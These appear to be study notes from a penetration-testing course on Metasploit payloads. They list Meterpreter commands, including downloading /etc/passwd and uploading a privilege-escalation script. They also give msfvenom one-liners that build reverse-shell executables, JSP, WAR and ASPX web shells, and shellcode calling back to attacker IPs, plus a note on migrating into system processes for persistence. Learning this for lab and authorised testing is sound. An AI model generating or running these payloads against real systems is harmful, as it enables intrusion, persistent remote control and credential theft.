x

Using Metasploit Payloads

21.2.1 - Meterpreter payload

We can gather further information on the system from our saved workspace info 

sysinfo

getuid

From the meterpreter shell we can background a channel after creating one with shell, then CTRL + Z 

shell

CTRL+Z

List all active channels 

channel -l

Change directory of kali in Meterpreter 

lpwd

lcd /home/kali/Downloads

We can download files from the remote machine using meterpreter 

download /etc/passwd

Upload files 

upload /usr/bin/unix-privesc-check /tmp/

21.2.2 - Executable payloads

Metasploit also provides the functionality to export payloads into various file types and formats such as Windows and Linux binaries, webshells, and more. Can run as meterpreter or non-meterpreter shells.

MSFVENOM Cheatsheet
https://github.com/frizb/MSF-Venom-Cheatsheet

Create a Windows executable with a revshell payload on the x64 architecture 

msfvenom -l payloads --platform windows --arch x64

Non-staged TCP revshell 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe

Staged TCP revshell 

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o staged.exe

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f elf -o revshell.elf

Linux 64 bit PHP 

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$IP LPORT=443 -f elf > shell.php

Windows 64 bit 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=<port you designated> -f exe -o ~/shell.exe

Windows 64 bit apache tomcat 

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$IP LPORT=80 -f raw > shell.jsp

Windows 64 bit aspx 

msfvenom -f aspx -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=443 -o shell64.aspx

Apache Tomcat War file 

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.179 LPORT=8080 -f war > shell.war

Javascript shellcode 

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.119.179 LPORT=443 -f js_le -o shellcode

Background revshell in the meterpreter payload as a job 

run -j

jobs

Migrate in Meterpreter

You'll see this come up
The migrate command in Meterpreter tells the payload to move itself into another, more stable process. This means:

  • The malicious Meterpreter code leaves the initial compromised process (which may be crashing or monitored),
  • And injects itself into a new process, usually something like explorer.exe, svchost.exe, or another system process,
  • Letting the session persist and continue interacting with the system.

This is super important for post-exploitation stability.

Left-click: follow link, Right-click: select node, Scroll: zoom
x